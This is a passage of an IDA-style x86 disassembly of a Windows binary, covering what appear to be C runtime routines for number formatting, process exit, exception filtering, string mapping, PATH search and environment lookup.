loc_4308E1: ; CODE XREF: sub_430840+8E�j
inc ecx
cmp ebx, 0Ah
jl short loc_4308F8
mov eax, ebx
push 0Ah
cdq
pop esi
idiv esi
add [ecx], al
mov eax, ebx
cdq
idiv esi
mov ebx, edx
loc_4308F8: ; CODE XREF: sub_430840+A5�j
add [ecx+1], bl
loc_4308FB: ; CODE XREF: sub_430840+7D�j
mov eax, edi
pop edi
pop esi
pop ebx
pop ebp
retn
sub_430840 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430902 proc near ; CODE XREF: sub_430A91+1E�p
var_3C = qword ptr -3Ch
var_28 = byte ptr -28h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 28h
lea eax, [ebp+var_28]
push esi
push eax
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+3Ch+var_3C]
call sub_434593
mov esi, [ebp+arg_8]
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+var_C]
add eax, esi
push eax
xor eax, eax
cmp [ebp+var_10], 2Dh
setz al
add eax, [ebp+arg_4]
push eax
call sub_43451C
lea eax, [ebp+var_10]
push 0
push eax
push esi
push [ebp+arg_4]
call sub_430957
mov eax, [ebp+arg_4]
add esp, 2Ch
pop esi
leave
retn
sub_430902 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430957 proc near ; CODE XREF: sub_430902+47�p
; sub_4309FE+6F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
push ebx
push esi
mov esi, [ebp+arg_8]
mov ebx, [ebp+arg_0]
push edi
mov eax, [esi+4]
dec eax
cmp [ebp+arg_C], 0
jz short loc_430987
cmp eax, [ebp+arg_4]
jnz short loc_430987
xor ecx, ecx
cmp dword ptr [esi], 2Dh
setz cl
add ecx, eax
add ecx, ebx
mov eax, ecx
mov byte ptr [eax], 30h
and byte ptr [eax+1], 0
loc_430987: ; CODE XREF: sub_430957+14�j
; sub_430957+19�j
cmp dword ptr [esi], 2Dh
mov edi, ebx
jnz short loc_430994
mov byte ptr [ebx], 2Dh
lea edi, [ebx+1]
loc_430994: ; CODE XREF: sub_430957+35�j
mov eax, [esi+4]
test eax, eax
jg short loc_4309AB
push 1
push edi
call sub_430AE2
pop ecx
mov byte ptr [edi], 30h
pop ecx
inc edi
jmp short loc_4309AD
; ---------------------------------------------------------------------------
loc_4309AB: ; CODE XREF: sub_430957+42�j
add edi, eax
loc_4309AD: ; CODE XREF: sub_430957+52�j
cmp [ebp+arg_4], 0
jle short loc_4309F7
push 1
push edi
call sub_430AE2
mov al, byte_4535C8
pop ecx
mov [edi], al
mov esi, [esi+4]
inc edi
pop ecx
test esi, esi
jge short loc_4309F7
cmp [ebp+arg_C], 0
jz short loc_4309D6
neg esi
jmp short loc_4309DD
; ---------------------------------------------------------------------------
loc_4309D6: ; CODE XREF: sub_430957+79�j
neg esi
cmp [ebp+arg_4], esi
jl short loc_4309E0
loc_4309DD: ; CODE XREF: sub_430957+7D�j
mov [ebp+arg_4], esi
loc_4309E0: ; CODE XREF: sub_430957+84�j
push [ebp+arg_4]
push edi
call sub_430AE2
push [ebp+arg_4]
push 30h
push edi
call sub_429760
add esp, 14h
loc_4309F7: ; CODE XREF: sub_430957+5A�j
; sub_430957+73�j
pop edi
mov eax, ebx
pop esi
pop ebx
pop ebp
retn
sub_430957 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4309FE proc near ; CODE XREF: sub_430A91+34�p
var_44 = qword ptr -44h
var_28 = byte ptr -28h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 28h
push ebx
push esi
lea eax, [ebp+var_28]
push edi
push eax
lea eax, [ebp+var_10]
push eax
mov eax, [ebp+arg_0]
push ecx
push ecx
fld qword ptr [eax]
fstp [esp+44h+var_44]
call sub_434593
mov eax, [ebp+var_C]
mov ebx, [ebp+arg_8]
lea esi, [eax-1]
xor eax, eax
cmp [ebp+var_10], 2Dh
setz al
add eax, [ebp+arg_4]
mov edi, eax
lea eax, [ebp+var_10]
push eax
push ebx
push edi
call sub_43451C
mov eax, [ebp+var_C]
add esp, 1Ch
dec eax
cmp esi, eax
setl cl
cmp eax, 0FFFFFFFCh
jl short loc_430A77
cmp eax, ebx
jge short loc_430A77
test cl, cl
jz short loc_430A63
loc_430A59: ; CODE XREF: sub_4309FE+60�j
mov al, [edi]
inc edi
test al, al
jnz short loc_430A59
and [edi-2], al
loc_430A63: ; CODE XREF: sub_4309FE+59�j
lea eax, [ebp+var_10]
push 1
push eax
push ebx
push [ebp+arg_4]
call sub_430957
add esp, 10h
jmp short loc_430A8C
; ---------------------------------------------------------------------------
loc_430A77: ; CODE XREF: sub_4309FE+51�j
; sub_4309FE+55�j
lea eax, [ebp+var_10]
push 1
push eax
push [ebp+arg_C]
push ebx
push [ebp+arg_4]
call sub_430840
add esp, 14h
loc_430A8C: ; CODE XREF: sub_4309FE+77�j
pop edi
pop esi
pop ebx
leave
retn
sub_4309FE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430A91 proc near ; CODE XREF: sub_42DC7D+3AA�p
; DATA XREF: sub_42A9A8�o ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
cmp [ebp+arg_8], 65h
jz short loc_430ACC
cmp [ebp+arg_8], 45h
jz short loc_430ACC
cmp [ebp+arg_8], 66h
jnz short loc_430AB9
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_430902
add esp, 0Ch
pop ebp
retn
; ---------------------------------------------------------------------------
loc_430AB9: ; CODE XREF: sub_430A91+13�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4309FE
jmp short loc_430ADD
; ---------------------------------------------------------------------------
loc_430ACC: ; CODE XREF: sub_430A91+7�j
; sub_430A91+D�j
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_4307DF
loc_430ADD: ; CODE XREF: sub_430A91+39�j
add esp, 10h
pop ebp
retn
sub_430A91 endp
; =============== S U B R O U T I N E =======================================
sub_430AE2 proc near ; CODE XREF: sub_430840+27�p
; sub_430957+47�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push edi
mov edi, [esp+4+arg_4]
test edi, edi
jz short loc_430B05
push esi
mov esi, [esp+8+arg_0]
push esi
call sub_4293A0
inc eax
push eax
push esi
add esi, edi
push esi
call sub_42BA90
add esp, 10h
pop esi
loc_430B05: ; CODE XREF: sub_430AE2+7�j
pop edi
retn
sub_430AE2 endp
; =============== S U B R O U T I N E =======================================
sub_430B07 proc near ; CODE XREF: .text:0042C619�p
mov eax, off_450E68
test eax, eax
jz short loc_430B12
call eax ; sub_42A990
loc_430B12: ; CODE XREF: sub_430B07+7�j
push offset dword_43A028
push offset dword_43A014
call sub_430C0D
push offset dword_43A010
push offset dword_43A000
call sub_430C0D
add esp, 10h
retn
sub_430B07 endp
; =============== S U B R O U T I N E =======================================
sub_430B34 proc near ; CODE XREF: .text:0042C658�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_430B56
add esp, 0Ch
retn
sub_430B34 endp
; =============== S U B R O U T I N E =======================================
sub_430B45 proc near ; CODE XREF: .text:0042AC86�p
; .text:0042C677�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_430B56
add esp, 0Ch
retn
sub_430B45 endp
; =============== S U B R O U T I N E =======================================
sub_430B56 proc near ; CODE XREF: sub_430B34+8�p
; sub_430B45+8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
call sub_430BFB
push 1
pop edi
cmp dword_676A0C, edi
jnz short loc_430B78
push [esp+4+arg_0]
call dword_43704C ; GetCurrentProcess
push eax
call dword_437118 ; TerminateProcess
loc_430B78: ; CODE XREF: sub_430B56+F�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov dword_676A08, edi
mov byte_676A04, bl
jnz short loc_430BCC
mov eax, dword_676ED4
test eax, eax
jz short loc_430BBB
mov ecx, dword_676ED0
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_430BBA
loc_430BA7: ; CODE XREF: sub_430B56+62�j
mov eax, [esi]
test eax, eax
jz short loc_430BAF
call eax
loc_430BAF: ; CODE XREF: sub_430B56+55�j
sub esi, 4
cmp esi, dword_676ED4
jnb short loc_430BA7
loc_430BBA: ; CODE XREF: sub_430B56+4F�j
pop esi
loc_430BBB: ; CODE XREF: sub_430B56+41�j
push offset dword_43A034
push offset dword_43A02C
call sub_430C0D
pop ecx
pop ecx
loc_430BCC: ; CODE XREF: sub_430B56+38�j
push offset dword_43A040
push offset dword_43A038
call sub_430C0D
pop ecx
pop ecx
test ebx, ebx
pop ebx
jz short loc_430BE9
call sub_430C04
pop edi
retn
; ---------------------------------------------------------------------------
loc_430BE9: ; CODE XREF: sub_430B56+8A�j
push [esp+4+arg_0]
mov dword_676A0C, edi
call dword_4370D4 ; ExitProcess
pop edi
retn
sub_430B56 endp
; =============== S U B R O U T I N E =======================================
sub_430BFB proc near ; CODE XREF: sub_42B7EB+1�p
; sub_430B56+1�p
push 0Dh
call sub_42DAEF
pop ecx
retn
sub_430BFB endp
; =============== S U B R O U T I N E =======================================
sub_430C04 proc near ; CODE XREF: sub_42B7EB:loc_42B860�p
; sub_430B56+8C�p
push 0Dh
call sub_42DB50
pop ecx
retn
sub_430C04 endp
; =============== S U B R O U T I N E =======================================
sub_430C0D proc near ; CODE XREF: sub_430B07+15�p
; sub_430B07+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_430C12: ; CODE XREF: sub_430C0D+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_430C25
mov eax, [esi]
test eax, eax
jz short loc_430C20
call eax
loc_430C20: ; CODE XREF: sub_430C0D+F�j
add esi, 4
jmp short loc_430C12
; ---------------------------------------------------------------------------
loc_430C25: ; CODE XREF: sub_430C0D+9�j
pop esi
retn
sub_430C0D endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430C27 proc near ; CODE XREF: .text:0042AC78�p
; .text:0042C669�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
push ebx
push esi
call sub_42E4EE
mov esi, eax
push dword ptr [esi+50h]
push [ebp+arg_0]
call sub_430D65
pop ecx
test eax, eax
pop ecx
jz loc_430D58
mov ebx, [eax+8]
test ebx, ebx
mov [ebp+arg_0], ebx
jz loc_430D58
cmp ebx, 5
jnz short loc_430C68
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_430D61
; ---------------------------------------------------------------------------
loc_430C68: ; CODE XREF: sub_430C27+33�j
cmp ebx, 1
jz loc_430D53
mov ecx, [esi+54h]
mov [ebp+var_4], ecx
mov ecx, [ebp+arg_4]
mov [esi+54h], ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_430D45
mov edx, dword_4538B0
mov ecx, dword_4538B4
add ecx, edx
push edi
cmp edx, ecx
jge short loc_430CC3
lea ecx, [edx+edx*2]
shl ecx, 2
loc_430CA2: ; CODE XREF: sub_430C27+97�j
mov edi, [esi+50h]
add ecx, 0Ch
and dword ptr [ecx+edi-4], 0
mov edi, dword_4538B0
mov ebx, dword_4538B4
inc edx
add ebx, edi
cmp edx, ebx
jl short loc_430CA2
mov ebx, [ebp+arg_0]
loc_430CC3: ; CODE XREF: sub_430C27+73�j
mov eax, [eax]
mov edi, [esi+58h]
cmp eax, 0C000008Eh
jnz short loc_430CD8
mov dword ptr [esi+58h], 83h
jmp short loc_430D36
; ---------------------------------------------------------------------------
loc_430CD8: ; CODE XREF: sub_430C27+A6�j
cmp eax, 0C0000090h
jnz short loc_430CE8
mov dword ptr [esi+58h], 81h
jmp short loc_430D36
; ---------------------------------------------------------------------------
loc_430CE8: ; CODE XREF: sub_430C27+B6�j
cmp eax, 0C0000091h
jnz short loc_430CF8
mov dword ptr [esi+58h], 84h
jmp short loc_430D36
; ---------------------------------------------------------------------------
loc_430CF8: ; CODE XREF: sub_430C27+C6�j
cmp eax, 0C0000093h
jnz short loc_430D08
mov dword ptr [esi+58h], 85h
jmp short loc_430D36
; ---------------------------------------------------------------------------
loc_430D08: ; CODE XREF: sub_430C27+D6�j
cmp eax, 0C000008Dh
jnz short loc_430D18
mov dword ptr [esi+58h], 82h
jmp short loc_430D36
; ---------------------------------------------------------------------------
loc_430D18: ; CODE XREF: sub_430C27+E6�j
cmp eax, 0C000008Fh
jnz short loc_430D28
mov dword ptr [esi+58h], 86h
jmp short loc_430D36
; ---------------------------------------------------------------------------
loc_430D28: ; CODE XREF: sub_430C27+F6�j
cmp eax, 0C0000092h
jnz short loc_430D36
mov dword ptr [esi+58h], 8Ah
loc_430D36: ; CODE XREF: sub_430C27+AF�j
; sub_430C27+BF�j ...
push dword ptr [esi+58h]
push 8
call ebx
pop ecx
mov [esi+58h], edi
pop ecx
pop edi
jmp short loc_430D4D
; ---------------------------------------------------------------------------
loc_430D45: ; CODE XREF: sub_430C27+5C�j
and dword ptr [eax+8], 0
push ecx
call ebx
pop ecx
loc_430D4D: ; CODE XREF: sub_430C27+11C�j
mov eax, [ebp+var_4]
mov [esi+54h], eax
loc_430D53: ; CODE XREF: sub_430C27+44�j
or eax, 0FFFFFFFFh
jmp short loc_430D61
; ---------------------------------------------------------------------------
loc_430D58: ; CODE XREF: sub_430C27+1C�j
; sub_430C27+2A�j
push [ebp+arg_4]
call dword_4371F0 ; UnhandledExceptionFilter
loc_430D61: ; CODE XREF: sub_430C27+3C�j
; sub_430C27+12F�j
pop esi
pop ebx
leave
retn
sub_430C27 endp
; =============== S U B R O U T I N E =======================================
sub_430D65 proc near ; CODE XREF: sub_430C27+13�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_4]
mov ecx, dword_4538BC
push esi
mov esi, [esp+4+arg_0]
cmp [edx], esi
push edi
mov eax, edx
jz short loc_430D8C
lea edi, [ecx+ecx*2]
lea edi, [edx+edi*4]
loc_430D81: ; CODE XREF: sub_430D65+25�j
add eax, 0Ch
cmp eax, edi
jnb short loc_430D8C
cmp [eax], esi
jnz short loc_430D81
loc_430D8C: ; CODE XREF: sub_430D65+14�j
; sub_430D65+21�j
lea ecx, [ecx+ecx*2]
lea ecx, [edx+ecx*4]
cmp eax, ecx
jnb short loc_430D9A
cmp [eax], esi
jz short loc_430D9C
loc_430D9A: ; CODE XREF: sub_430D65+2F�j
xor eax, eax
loc_430D9C: ; CODE XREF: sub_430D65+33�j
pop edi
pop esi
retn
sub_430D65 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430D9F proc near ; CODE XREF: sub_42AF20+C5�p
; sub_42AF20+F3�p ...
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
arg_14 = dword ptr 1Ch
arg_18 = dword ptr 20h
arg_1C = dword ptr 24h
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_437678
push offset sub_42ADC4
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 1Ch
push ebx
push esi
push edi
mov [ebp+var_18], esp
xor edi, edi
cmp dword_676A10, edi
jnz short loc_430E15
push edi
push edi
push 1
pop ebx
push ebx
push offset dword_437670
mov esi, 100h
push esi
push edi
call dword_4371E8 ; LCMapStringW
test eax, eax
jz short loc_430DF3
mov dword_676A10, ebx
jmp short loc_430E15
; ---------------------------------------------------------------------------
loc_430DF3: ; CODE XREF: sub_430D9F+4A�j
push edi
push edi
push ebx
push offset word_454038
push esi
push edi
call dword_4371EC ; LCMapStringA
test eax, eax
jz loc_430F2D
mov dword_676A10, 2
loc_430E15: ; CODE XREF: sub_430D9F+2E�j
; sub_430D9F+52�j
cmp [ebp+arg_C], edi
jle short loc_430E2A
push [ebp+arg_C]
push [ebp+arg_8]
call sub_435D62
pop ecx
pop ecx
mov [ebp+arg_C], eax
loc_430E2A: ; CODE XREF: sub_430D9F+79�j
mov eax, dword_676A10
cmp eax, 2
jnz short loc_430E51
push [ebp+arg_14]
push [ebp+arg_10]
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4371EC ; LCMapStringA
jmp loc_430F2F
; ---------------------------------------------------------------------------
loc_430E51: ; CODE XREF: sub_430D9F+93�j
cmp eax, 1
jnz loc_430F2D
cmp [ebp+arg_18], edi
jnz short loc_430E67
mov eax, dword_6769B8
mov [ebp+arg_18], eax
loc_430E67: ; CODE XREF: sub_430D9F+BE�j
push edi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
mov eax, [ebp+arg_1C]
neg eax
sbb eax, eax
and eax, 8
inc eax
push eax
push [ebp+arg_18]
call dword_437184 ; MultiByteToWideChar
mov ebx, eax
mov [ebp+var_1C], ebx
cmp ebx, edi
jz loc_430F2D
mov [ebp+var_4], edi
lea eax, [ebx+ebx]
add eax, 3
and al, 0FCh
call sub_429B60
mov [ebp+var_18], esp
mov eax, esp
mov [ebp+var_24], eax
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_430EC2
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
mov [ebp+var_24], edi
or [ebp+var_4], 0FFFFFFFFh
mov ebx, [ebp+var_1C]
loc_430EC2: ; CODE XREF: sub_430D9F+10E�j
cmp [ebp+var_24], edi
jz short loc_430F2D
push ebx
push [ebp+var_24]
push [ebp+arg_C]
push [ebp+arg_8]
push 1
push [ebp+arg_18]
call dword_437184 ; MultiByteToWideChar
test eax, eax
jz short loc_430F2D
push edi
push edi
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4371E8 ; LCMapStringW
mov esi, eax
mov [ebp+var_28], esi
cmp esi, edi
jz short loc_430F2D
test byte ptr [ebp+arg_4+1], 4
jz short loc_430F41
cmp [ebp+arg_14], edi
jz loc_430FBC
cmp esi, [ebp+arg_14]
jg short loc_430F2D
push [ebp+arg_14]
push [ebp+arg_10]
push ebx
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4371E8 ; LCMapStringW
test eax, eax
jnz loc_430FBC
loc_430F2D: ; CODE XREF: sub_430D9F+66�j
; sub_430D9F+B5�j ...
xor eax, eax
loc_430F2F: ; CODE XREF: sub_430D9F+AD�j
; sub_430D9F+21F�j
lea esp, [ebp-38h]
mov ecx, [ebp+var_10]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
leave
retn
; ---------------------------------------------------------------------------
loc_430F41: ; CODE XREF: sub_430D9F+160�j
mov [ebp+var_4], 1
lea eax, [esi+esi]
add eax, 3
and al, 0FCh
call sub_429B60
mov [ebp+var_18], esp
mov ebx, esp
mov [ebp+var_20], ebx
or [ebp+var_4], 0FFFFFFFFh
jmp short loc_430F75
; ---------------------------------------------------------------------------
push 1
pop eax
retn
; ---------------------------------------------------------------------------
mov esp, [ebp+var_18]
xor edi, edi
xor ebx, ebx
or [ebp+var_4], 0FFFFFFFFh
mov esi, [ebp+var_28]
loc_430F75: ; CODE XREF: sub_430D9F+1C2�j
cmp ebx, edi
jz short loc_430F2D
push esi
push ebx
push [ebp+var_1C]
push [ebp+var_24]
push [ebp+arg_4]
push [ebp+arg_0]
call dword_4371E8 ; LCMapStringW
test eax, eax
jz short loc_430F2D
cmp [ebp+arg_14], edi
push edi
push edi
jnz short loc_430F9C
push edi
push edi
jmp short loc_430FA2
; ---------------------------------------------------------------------------
loc_430F9C: ; CODE XREF: sub_430D9F+1F7�j
push [ebp+arg_14]
push [ebp+arg_10]
loc_430FA2: ; CODE XREF: sub_430D9F+1FB�j
push esi
push ebx
push 220h
push [ebp+arg_18]
call dword_437074 ; WideCharToMultiByte
mov esi, eax
cmp esi, edi
jz loc_430F2D
loc_430FBC: ; CODE XREF: sub_430D9F+165�j
; sub_430D9F+188�j
mov eax, esi
jmp loc_430F2F
sub_430D9F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_430FC3 proc near ; CODE XREF: sub_42B0E9+96�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push esi
push edi
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_431128
add esp, 10h
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz loc_431121
call sub_42F119
cmp dword ptr [eax], 2
jnz loc_431121
push 2Fh
push [ebp+arg_4]
call sub_434794
pop ecx
test eax, eax
pop ecx
jnz loc_431121
push offset aPath ; "PATH"
call sub_4312C2
mov edi, eax
pop ecx
test edi, edi
jz loc_431121
push 104h
call sub_4297B8
mov esi, eax
pop ecx
test esi, esi
jz loc_431121
push ebx
mov ebx, 103h
push ebx
push esi
push edi
loc_43103F: ; CODE XREF: sub_430FC3+151�j
call sub_434720
add esp, 0Ch
mov [ebp+var_4], eax
test eax, eax
jz loc_431119
cmp byte ptr [esi], 0
jz loc_431119
push esi
call sub_4293A0
lea edi, [eax+esi-1]
pop ecx
mov al, [edi]
cmp al, 5Ch
jnz short loc_43107A
push 5Ch
push esi
call sub_4346AE
pop ecx
cmp edi, eax
pop ecx
jmp short loc_43107C
; ---------------------------------------------------------------------------
loc_43107A: ; CODE XREF: sub_430FC3+A7�j
cmp al, 2Fh
loc_43107C: ; CODE XREF: sub_430FC3+B5�j
jz short loc_43108B
push offset asc_44DABC ; "\\"
push esi
call sub_42A5E0
pop ecx
pop ecx
loc_43108B: ; CODE XREF: sub_430FC3:loc_43107C�j
push esi
call sub_4293A0
push [ebp+arg_4]
mov edi, eax
call sub_4293A0
add edi, eax
pop ecx
cmp edi, 104h
pop ecx
jnb short loc_431119
push [ebp+arg_4]
push esi
call sub_42A5E0
push [ebp+arg_C]
push [ebp+arg_8]
push esi
push [ebp+arg_0]
call sub_431128
add esp, 18h
cmp eax, 0FFFFFFFFh
mov [ebp+var_8], eax
jnz short loc_431119
call sub_42F119
cmp dword ptr [eax], 2
jz short loc_43110F
push 5Ch
push esi
call sub_434794
pop ecx
cmp esi, eax
pop ecx
jz short loc_4310F0
push 2Fh
push esi
call sub_434794
pop ecx
cmp esi, eax
pop ecx
jnz short loc_431119
loc_4310F0: ; CODE XREF: sub_430FC3+11D�j
lea edi, [esi+1]
push 5Ch
push edi
call sub_434794
pop ecx
cmp edi, eax
pop ecx
jz short loc_43110F
push 2Fh
push edi
call sub_434794
pop ecx
cmp edi, eax
pop ecx
jnz short loc_431119
loc_43110F: ; CODE XREF: sub_430FC3+10F�j
; sub_430FC3+13C�j
push ebx
push esi
push [ebp+var_4]
jmp loc_43103F
; ---------------------------------------------------------------------------
loc_431119: ; CODE XREF: sub_430FC3+89�j
; sub_430FC3+92�j ...
push esi
call sub_4298F2
pop ecx
pop ebx
loc_431121: ; CODE XREF: sub_430FC3+21�j
; sub_430FC3+2F�j ...
mov eax, [ebp+var_8]
pop edi
pop esi
leave
retn
sub_430FC3 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431128 proc near ; CODE XREF: sub_42B0E9+4F�p
; sub_430FC3+13�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
mov ebx, [ebp+arg_4]
push esi
push edi
push 5Ch
push ebx
mov edi, ebx
call sub_4346AE
push 2Fh
push ebx
mov esi, eax
call sub_4346AE
add esp, 10h
test eax, eax
jnz short loc_431193
test esi, esi
jnz short loc_43119D
push 3Ah
push ebx
call sub_434794
mov esi, eax
pop ecx
test esi, esi
pop ecx
jnz short loc_43119D
push ebx
call sub_4293A0
add eax, 3
push eax
call sub_4297B8
mov edi, eax
pop ecx
test edi, edi
pop ecx
jz short loc_4311F6
push offset a__0 ; ".\\"
push edi
call sub_42A5D0
push ebx
push edi
call sub_42A5E0
add esp, 10h
lea esi, [edi+2]
jmp short loc_43119D
; ---------------------------------------------------------------------------
loc_431193: ; CODE XREF: sub_431128+24�j
test esi, esi
jz short loc_43119B
cmp eax, esi
jbe short loc_43119D
loc_43119B: ; CODE XREF: sub_431128+6D�j
mov esi, eax
loc_43119D: ; CODE XREF: sub_431128+28�j
; sub_431128+38�j ...
or [ebp+var_8], 0FFFFFFFFh
push 2Eh
push esi
call sub_4346AE
pop ecx
test eax, eax
pop ecx
jz short loc_4311DC
push 0
push edi
call sub_42A6C0
pop ecx
cmp eax, 0FFFFFFFFh
pop ecx
jz loc_43125E
push [ebp+arg_C]
push [ebp+arg_8]
push edi
push [ebp+arg_0]
call sub_431271
add esp, 10h
mov [ebp+var_8], eax
jmp loc_43125E
; ---------------------------------------------------------------------------
loc_4311DC: ; CODE XREF: sub_431128+85�j
push edi
call sub_4293A0
add eax, 5
push eax
call sub_4297B8
mov ebx, eax
pop ecx
test ebx, ebx
pop ecx
mov [ebp+var_4], ebx
jnz short loc_4311FB
loc_4311F6: ; CODE XREF: sub_431128+4F�j
or eax, 0FFFFFFFFh
jmp short loc_43126C
; ---------------------------------------------------------------------------
loc_4311FB: ; CODE XREF: sub_431128+CC�j
push edi
push ebx
call sub_42A5D0
push edi
call sub_4293A0
mov esi, eax
add esp, 0Ch
add esi, ebx
mov ebx, offset off_4538CC
loc_431214: ; CODE XREF: sub_431128+10F�j
push dword ptr [ebx]
push esi
call sub_42A5D0
push 0
push [ebp+var_4]
call sub_42A6C0
add esp, 10h
cmp eax, 0FFFFFFFFh
jnz short loc_43123B
sub ebx, 4
cmp ebx, offset off_4538C0
jge short loc_431214
jmp short loc_431252
; ---------------------------------------------------------------------------
loc_43123B: ; CODE XREF: sub_431128+104�j
push [ebp+arg_C]
push [ebp+arg_8]
push [ebp+var_4]
push [ebp+arg_0]
call sub_431271
add esp, 10h
mov [ebp+var_8], eax
loc_431252: ; CODE XREF: sub_431128+111�j
push [ebp+var_4]
call sub_4298F2
mov ebx, [ebp+arg_4]
pop ecx
loc_43125E: ; CODE XREF: sub_431128+94�j
; sub_431128+AF�j
cmp edi, ebx
jz short loc_431269
push edi
call sub_4298F2
pop ecx
loc_431269: ; CODE XREF: sub_431128+138�j
mov eax, [ebp+var_8]
loc_43126C: ; CODE XREF: sub_431128+D1�j
pop edi
pop esi
pop ebx
leave
retn
sub_431128 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_431271 proc near ; CODE XREF: sub_431128+A4�p
; sub_431128+11F�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_4]
lea eax, [ebp+arg_8]
push eax
lea eax, [ebp+arg_C]
push eax
push [ebp+arg_C]
push [ebp+arg_8]
call sub_434A14
add esp, 14h
cmp eax, 0FFFFFFFFh
jnz short loc_431296
or eax, eax
pop ebp
retn
; ---------------------------------------------------------------------------
loc_431296: ; CODE XREF: sub_431271+1F�j
push esi
push [ebp+arg_8]
push [ebp+arg_C]
push [ebp+arg_4]
push [ebp+arg_0]
call sub_43482B
push [ebp+arg_C]
mov esi, eax
call sub_4298F2
push [ebp+arg_8]
call sub_4298F2
add esp, 18h
mov eax, esi
pop esi
pop ebp
retn
sub_431271 endp
; =============== S U B R O U T I N E =======================================
sub_4312C2 proc near ; CODE XREF: sub_42B0E9+D�p
; sub_430FC3+4E�p
arg_0 = dword ptr 4
push esi
push 0Ch
call sub_42DAEF
push [esp+8+arg_0]
call sub_4312E3
push 0Ch
mov esi, eax
call sub_42DB50
add esp, 0Ch
mov eax, esi
pop esi
retn
sub_4312C2 endp
; =============== S U B R O U T I N E =======================================
sub_4312E3 proc near ; CODE XREF: sub_4312C2+C�p
; sub_4339B6+31�p
arg_0 = dword ptr 4
cmp dword_676EC8, 0
push ebx
push esi
mov esi, dword_6769EC
push edi
jz short loc_43135A
test esi, esi
jnz short loc_431314
cmp dword_6769F4, esi
jz short loc_43135A
call sub_434C59
test eax, eax
jnz short loc_43135A
mov esi, dword_6769EC
test esi, esi
jz short loc_43135A
loc_431314: ; CODE XREF: sub_4312E3+14�j
mov ebx, [esp+0Ch+arg_0]
test ebx, ebx
jz short loc_43135A
push ebx
call sub_4293A0
pop ecx
mov edi, eax
loc_431325: ; CODE XREF: sub_4312E3+6D�j
mov eax, [esi]
test eax, eax
jz short loc_43135A
push eax
call sub_4293A0
cmp eax, edi
pop ecx
jbe short loc_43134D
mov eax, [esi]
cmp byte ptr [eax+edi], 3Dh
jnz short loc_43134D
push edi
push ebx
push eax
